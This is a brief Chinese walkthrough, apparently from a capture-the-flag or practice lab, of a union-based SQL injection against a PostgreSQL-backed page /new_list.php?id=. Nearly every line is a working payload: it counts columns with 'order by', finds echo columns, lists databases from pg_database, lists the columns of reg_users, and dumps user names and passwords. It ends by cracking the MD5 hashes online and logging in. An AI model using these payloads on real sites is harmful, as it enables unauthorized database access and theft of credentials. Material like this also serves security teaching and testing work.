还是先来看是否存在漏洞
然后判断列数这里到order by 5页面不正常
/new_list.php?id=1 order by 5
判断回显点这里回显点不一样需要你判断哪个需要用‘’单引号包起来
/new_list.php? id=1 and 1=2 union select null,'2','3', null
查看所有数据库
/new_list.php? id=1 and 1=2 union select null,'2',string_agg(datname,','), null from pg_database
查看列
/new_list.php? id=1 and 1=2 union select null,'2',string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
紧接着就是查看表中内容
/new_list.php? id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
然后看到用户和密码后去MD5在线解密中去解密
这里随便解密一个去登录就完成了